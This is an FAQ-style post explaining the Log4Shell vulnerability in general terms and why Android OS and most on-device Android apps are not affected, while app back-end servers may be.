Q: What is the Log4j vulnerability (also known as Log4Shell)
JNDI is the Java Naming and Directory Interface. It is not an app, but a library/service allowing for runtime configuration. Log4j is a common library used in server applications. Certain strings when used with the v2.x version of the Log4j library can invoke the JNDI API which can result in leaking of sensitive information and thereby facilitate other attacks. Basically this a variation of input sanitization, except in a logging utility which for reasons had a useful but dangerous feature enabled.
Insert “XKCD Little Bobby Tables” reference here.
Q: Is Android OS vulnerable?
A: Not by this particular vulnerability – Android OS while parts are written in Java uses its own logging library. Android OS also doesn’t use JNDI protocol/service and isolates each app in its own sandbox. While this means that this particular JNDI exploit can’t be used on Android, history has shown that Android is not without bugs and exploits, resulting in more security with each version.
Q: Are Android Apps vulnerable?
A: Depends – Android apps can either only exist on device OR serve as the front end of a cloud service. Android apps undoubtedly have their own bugs. On older devices apps could access the global logcat where poorly written apps may output username/passwords/other keys which while useful for debugging isn’t good in a production app. As of Android 4.1 Android apps can only access their own logs.
The servers which the mobile apps depend upon is a different story as noted in the media.
Q: But what about Android Apps which use Log4j
A: On device a developer would really need to put in effort to add in Log4j separately. As seen here Log4j out of the box needs Java classes which Android doesn’t support. And while there is a port for Android it is based on Log4j version 1.x which is EOL, it seems that version had it own problems which would dissuade Android developers. Alternatively an Android developer may use slf4j for Android or other actively developed logger shims on top of Android framework’s native logging facility.
What is JNDI? What is its basic use? When is it used?